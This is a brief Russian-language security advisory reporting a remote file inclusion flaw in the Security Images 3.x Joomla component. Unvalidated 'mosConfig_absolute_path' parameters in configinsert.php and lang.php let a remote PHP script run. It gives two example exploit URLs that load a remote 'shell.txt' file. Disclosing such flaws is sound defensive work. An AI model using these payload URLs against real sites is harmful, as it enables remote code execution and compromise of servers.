Программа: Security Images 3.x (компонент Joomla)

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Ошибка
возникает из-за отсутствия проверки
параметра "mosConfig_absolute_path" в скриптах
configinsert.php и lang.php.

Пример:

http://web/components/com_securityimages/ configinsert.php?mosConfig_absolute_path=http://shell.txt
http://web/components/com_securityimages/lang.php? mosConfig_absolute_path=http://shell.txt



Оставить мнение